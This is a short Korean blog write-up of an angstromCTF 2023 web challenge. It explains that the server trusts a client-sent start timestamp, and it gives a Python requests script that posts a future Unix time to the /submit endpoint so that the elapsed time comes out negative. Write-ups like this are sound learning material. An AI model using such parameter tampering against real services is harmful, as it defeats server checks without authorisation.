1. 개요
web 분석, payload 조작문제
2. 분석
버튼을 누르면 시작시간을 보내고, 모두를 이겨야한다고 합니다.
아마도 서버에서 걸린시간 = 종료 시간 - 시작 시간으로 계산하는 것 같습니다.
아예 시작시간을 미래의 숫자로 넣어서, 걸린시간을 음수로 넣어줍니다.
시작 시간 포맷은 unix time stamp 입니다.
3. 코드
import requests
base_url = "https://mount-tunnel.web.actf.co"
data = {
'start': 2682752325.8505517
}
result = requests.post(f"{base_url}/submit", data)
print('result: ', result.text)
'CTF' 카테고리의 다른 글
| [angstromCTF 2023] brokenlogin (0) | 2023.04.29 |
|---|---|
| [angstromCTF 2023] hallmark (0) | 2023.04.29 |
| [BSidesSF 2023 CTF] prototype (0) | 2023.04.26 |
| [angstromCTF 2023] directory (0) | 2023.04.22 |
| [BSidesSF 2023 CTF] web-tutorial-3 (0) | 2023.04.22 |
